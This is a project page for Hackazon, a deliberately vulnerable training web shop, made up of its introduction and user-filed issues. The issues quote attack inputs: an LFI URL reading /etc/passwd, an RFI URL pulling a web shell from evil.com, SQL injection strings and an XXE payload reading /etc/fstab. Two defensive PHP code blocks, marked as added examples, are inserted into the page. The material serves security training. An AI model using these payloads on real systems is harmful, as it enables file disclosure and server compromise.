
hackazon's Introduction

Hackazon

Hackazon is a free, vulnerable test site: an online storefront built with the same technologies used in today’s rich client and mobile applications. Hackazon has an AJAX interface, strict workflows and RESTful APIs used by a companion mobile app, providing a uniquely effective training and testing ground for IT security professionals. And it’s full of your favorite vulnerabilities, like SQL injection, cross-site scripting and so on.

Today’s web and mobile applications as well as web services have a host of new technologies that are not being adequately tested for security vulnerabilities. It is critical for IT security professionals to have a vulnerable web application to use for testing the effectiveness of their tools and for honing their skills.

Hackazon enables users to configure each area of the application in order to change the vulnerability landscape, to prevent “known vuln testing” or any other form of ‘cheating.’ Since the application includes RESTful interfaces that power AJAX functionality and mobile clients (JSON, XML, GWT and AMF), users will need the latest application security testing tools and techniques to discover all the vulnerabilities. Hackazon also requires detailed testing of strict workflows, like shopping carts, that are commonly used in business applications.

Features

Technical Details

Additional Information

hackazon's People

Contributors

10kote, alisovtsev, an78drew, bturner-r7, denispodgurskii, denispodgurskiy, hackazon, ivan-podgurskiy, nchervyakov, sdavis-r7, simonirwin-r7, tkimdoodle, wwalker-r7


hackazon's Issues

Vulnerability Misclassified

In your practice application you have misclassified LFI as RFI.

On https://github.com/rapid7/hackazon/blob/master/VULNERABILITIES.md you say:

Remote File Include:

RFI Injection allows using app logic where the app includes some file based on user input. In our app it's implemented in the Help Articles section:

http://hackazon.dev/account/help_articles?page=add_product_to_cart
The vulnerability can be used as such:

http://hackazon.dev/account/help_articles?page=/etc/passwd%00

This is pulling a local file, and the vuln present is LFI not RFI.

RFI would be using the script to pull in external content like a flash plugin or a text file from an external server that then gets parsed and included in-line to exploit either the user or the system. Like so:

http://hackazon.dev/account/help_articles?page=http://evil.com/shell.txt

The value of which would be a web shell, like so:
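To make the LFI/RFI distinction above concrete from the defender's side, here is an added example (not Hackazon's own code) of a help-article handler that labels the `page` parameter as an allowed key, a local path or a remote URL for logging, and resolves it through an allowlist so that neither kind of include is possible. The `HELP_ARTICLES` map and its file paths are assumptions; the three sample values are the ones quoted in the issue.

```php
<?php
// Added example, not Hackazon's own code.
// Allowlist of help articles: the key is the only value the "page"
// parameter may carry; the file paths are assumed for illustration.
const HELP_ARTICLES = [
    'add_product_to_cart' => 'help/add_product_to_cart.html',
    'checkout'            => 'help/checkout.html',
];

/**
 * Label an attempt on the "page" parameter for logging/detection:
 *  'allowed' - a known article key
 *  'remote'  - a URL or stream wrapper (scheme followed by ':'), the RFI pattern
 *  'local'   - anything else: a filesystem path, traversal or null byte, the LFI pattern
 */
function classify_page_param(string $page): string
{
    if (array_key_exists($page, HELP_ARTICLES)) {
        return 'allowed';
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $page) === 1) {
        return 'remote';
    }
    return 'local';
}

/**
 * Resolve the file to include. The user value is only ever used as an
 * array key and never concatenated into a path, so "/etc/passwd\0" and
 * "http://evil.com/shell.txt" both fall back to the default article.
 */
function resolve_help_article(string $page): string
{
    return HELP_ARTICLES[$page] ?? HELP_ARTICLES['add_product_to_cart'];
}

// The three values from the issue, as PHP sees them after URL decoding
$samples = ['add_product_to_cart', "/etc/passwd\0", 'http://evil.com/shell.txt'];
foreach ($samples as $page) {
    printf("%-30s %-8s -> %s\n",
        addcslashes($page, "\0"), classify_page_param($page), resolve_help_article($page));
}
```

The `classify_page_param` label is what a request log or WAF rule would record; the include decision itself depends only on the allowlist lookup.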

Installation

I'm using an Ubuntu 14.04 LTS server and I'm trying to configure Hackazon. Every time I browse to localhost/hackazon/web/, it redirects to /install and displays a 404 error. Please help?

Database problem

Error 42S02: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'hackazon.tbl_product_options_values' doesn't exist

Admin page error after login

I used an Ubuntu 16.04.2 LTS minimal server to install Hackazon. After login I found an error like this on the admin page:

Fatal error: Uncaught Error: Call to a member function getClassAnnotation() on null in /var/www/hackazon/modules/vulninjection/classes/VulnModule/AnnotationReader.php:51 Stack trace: #0 /var/www/hackazon/modules/vulninjection/classes/VulnModule/Config/ContextMetadataFactory.php(88): VulnModule\AnnotationReader->getClassAnnotation('App\Controller\...', 'VulnModule\Conf...') #1 /var/www/hackazon/modules/vulninjection/classes/VulnModule/Config/Context.php(741): VulnModule\Config\ContextMetadataFactory->getMetadata('account', 'orders', 'web') #2 /var/www/hackazon/modules/vulninjection/classes/VulnModule/VulnerabilityMatrixRenderer.php(106): VulnModule\Config\Context->getURL() #3 /var/www/hackazon/modules/vulninjection/classes/VulnModule/VulnerabilityMatrixRenderer.php(85): VulnModule\VulnerabilityMatrixRenderer->calculateVulnMatrix(Object(VulnModule\Config\Context), 3) #4 /var/www/hackazon/modules/vulninjection/classes/VulnModule/VulnerabilityMatrixRenderer.php(85): VulnModule\VulnerabilityMatrixRenderer->calculateVulnMatr in /var/www/hackazon/modules/vulninjection/classes/VulnModule/AnnotationReader.php on line 51

Can somebody help me?

localhost/install: URL NOT FOUND

I've been messing around a bit and eventually got it far enough to react.
Now I'm stuck at this issue.
I type in the localhost address and get automatically redirected to "localhost/install", which shows that the URL was not found.

Please help

503 Service Temporarily Unavailable

Hello,

I observed this issue on several pages of Hackazon. For instance, on the admin page, when I tried to add a new user, I got this return code.
In general, when I send a POST request, I receive this 503 HTTP code.

Do you know if this is "as designed" or a bug?

Kind regards,

Home continuously crashing by products_viewed cookie with malformed SQL Injection

As I say in the title, if you inject a malformed SQL injection that makes the PHP process crash, on the URL http://domain.com/product/view?id=81 and the param 'id', it will continuously crash on every Home page load.

I had to delete cookies to be able to visit the home after the bad injection because I was crashing just loading the Home.

A solution would be to store only the products whose query returned true, not all the data in the requested id param, because at the moment it saves the malformed SQL injection that belongs to the learning process.

For example: http://vuln2.devo.com/product/view?id=81' and 1=1
(without a comment at the end)
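The fix proposed above, as an added example that is not Hackazon's own code: only integer ids of products that actually exist are written back to the cookie, so a malformed `id` value is never persisted and cannot be replayed on every Home page load. The sample cookie value is the `visited_products` value from the captured request in the XXE issue further down this page (the issue title calls the cookie products_viewed); `$productExists` stands in for the app's product lookup and is an assumption.

```php
<?php
// Added example, not Hackazon's own code. Rebuilds the visited_products
// cookie so that only integer ids of existing products are persisted; a
// malformed id such as "81' and 1=1" is never written back, so it cannot
// crash every following Home page load.

/** Parse a raw cookie value into clean integer ids; non-numeric parts are dropped. */
function parse_visited_products(string $rawCookie): array
{
    $ids = [];
    foreach (explode(',', urldecode($rawCookie)) as $part) {
        $part = trim($part);
        // ctype_digit rejects '', '1 or 1=1', '1=1', '101and 1=1' and negatives
        if ($part !== '' && ctype_digit($part)) {
            $ids[] = (int) $part;
        }
    }
    return array_values(array_unique($ids));
}

/**
 * Record a product view. $productExists stands in for the app's product
 * query (an assumption); returns the id list the caller serialises back
 * into the cookie. The raw id parameter itself never reaches the cookie.
 */
function record_product_view(string $rawCookie, string $idParam, callable $productExists): array
{
    $ids = parse_visited_products($rawCookie);
    if (!ctype_digit($idParam)) {
        return $ids;                      // malformed id: keep only the cleaned list
    }
    $id = (int) $idParam;
    if (!in_array($id, $ids, true) && $productExists($id)) {
        $ids[] = $id;
    }
    return $ids;
}

// Sample input: the polluted visited_products value captured in the XXE issue on this page
$raw = '%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C';
$exists = function (int $id): bool { return $id > 0 && $id < 300; }; // stand-in for a DB lookup
print_r(record_product_view($raw, "81' and 1=1", $exists)); // injection dropped; 81 already in the cookie
print_r(record_product_view($raw, '205', $exists));         // 205 appended after the existence check
```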

demo_database.sql - ERROR 1452 (23000) at line 5

Hi,

When I try to import demo_database.sql I get the following error:

hackazon_db_1 | ERROR 1452 (23000) at line 5: Cannot add or update a child row: a foreign key constraint fails (hackazon.tbl_enquiries, CONSTRAINT tbl_enquiries_ibfk_1 FOREIGN KEY (created_by) REFERENCES tbl_users (id) ON DELETE CASCADE ON UPDATE CASCADE)

Full Docker logs: db_error.txt

Can you help me with this?

The DB is running on this Docker image: https://github.com/PierrickV/hackazon

Thanks

Traversing to different products on the Hackazon website results in a Request URL Not Found error

I was able to successfully install Hackazon with a MySQL DB on an Apache web server.

I am able to access the Hackazon index page successfully, but on traversing to different products on the website I see a Request URL Not Found error. Please find attached the screenshot for reference.

I am not sure whether I need to create product directories on the base path, or what else I am missing. Any help here would help my testing.

Thanks
Srikanth

Android APK

Is the hackazon.apk open source and free to test for bugs?

[Feature request] Docker-compose

Hi,

Could you provide a docker-compose file to install/deploy Hackazon?
It would be way more handy than manual steps or than using the OVA.

Is this project abandoned?

The last commit seems to be from three years ago.
Besides, this project is based on PHP 5.x, not PHP 7.x.
That's not "modern".
Thanks!

Issues with XXE

XXE vulnerabilities seem not to be functioning.

I have verified that XXE is enabled in the vulnerabilities.md file; I have also logged in to the admin page and ensured that the pages with the XXE vulnerability were enabled. I turned it on in every location that I could, just in case. I verified the PHP files in the config location to ensure that XXE was set to true for the location I needed. I enabled XXE for the Cart/View area.

I set up Burp to intercept the HTTP GET requests, and I captured the request below.

---ORIGINAL CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1
---END OF CODE---

I modified the request to include the XML example code from the vulnerability description.

---MODIFIED CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1

<'?xml version="1.0" encoding="utf-8"?>
<'!DOCTYPE roottag [<'!ENTITY goodies SYSTEM "file:///etc/fstab">]>
<'roottag>&goodies;
---END OF CODE---

NOTE: I added ' at the start of each line to allow the code to display correctly in the note. In the real example, the ' was removed.

I have also modified the goodies entity to see if the passwd file would display.

I only get an HTTP 400 error in return.

I have tried clearing the cache, I have tried doing this in a VM with no other content, and I ensured that Firefox was updated.

Has anyone tested and/or seen XXE vulnerabilities function with hackazon?

ADMIN Create new Product - undefined method

If I try to create a new product I get an undefined method error.
Path: admin/product/new

Fatal error: Call to undefined method App\Admin\Controller\Product::getRoleOptions() in /var/www/html/classes/App/Admin/Controller/Product.php on line 184

Default vulnerabilities are not working

Hi all,

Just wondering about the current master...

It seems like the default vulnerabilities are hit and miss. As an authenticated user, for instance, one command injection works. SQL injections don't seem to work (some, not all), although an HTTP error is returned. It's not set to blind, so I am not sure if this is the expected behaviour or something is not working well in there.

For example, adding SQL injection to any search page fields doesn't seem to work on my installation.

Any advice would be great. Thanks!

Installation wizard throws error

After installing all the repos, I tried accessing http://localhost/install and it throws the following error.

Fatal error: Call to undefined function bcpow() in /var/www/hackazon/vendor/gwtphp/gwtphp/src/util/TypeConversionUtil.class.php on line 207

Any help?

Thank you

Seeing 404 Not Found Error during Hackazon Installation

I followed the installation instructions mentioned in these links: https://renouncedthoughts.files.wordpress.com/2017/02/hackazon_users_guide.pdf and https://github.com/rapid7/hackazon/wiki

Everything went well, but when I accessed the web URL for installation, it failed with 404 Not Found. I also don't see an install directory in the /hackazon/web path.

Below is the output of the composer.phar installation; I am not sure whether the required packages have been installed.
root@WAFBackendServer1:/var/www/html/hackazon# php composer.phar install
Do not run Composer as root/super user! See https://getcomposer.org/root for details
Loading composer repositories with package information
Installing dependencies (including require-dev) from lock file
Nothing to install or update
Generating autoload files

Also attached is the error screenshot from accessing the Hackazon installation page in the browser.

Let me know if more information is needed

.ova file does not have a network interface

I went to download the .ova file linked on the Wiki, but when I went to grab the IP using ifconfig, it looks like the network interface is disabled (just loopback displays). I thought that it was something on my end using VirtualBox, but I was able to download and bridge other VMs without an issue. I was even able to manually install Hackazon onto Ubuntu 14 and get it running in VirtualBox, so it makes me think that something is wrong with the .ova file.

Here is an error that I got on startup:
Error Screenshot

And here is the output when I run ifconfig:
ifconfig output screenshot

Is this just an issue on my part or is anyone else able to confirm this?
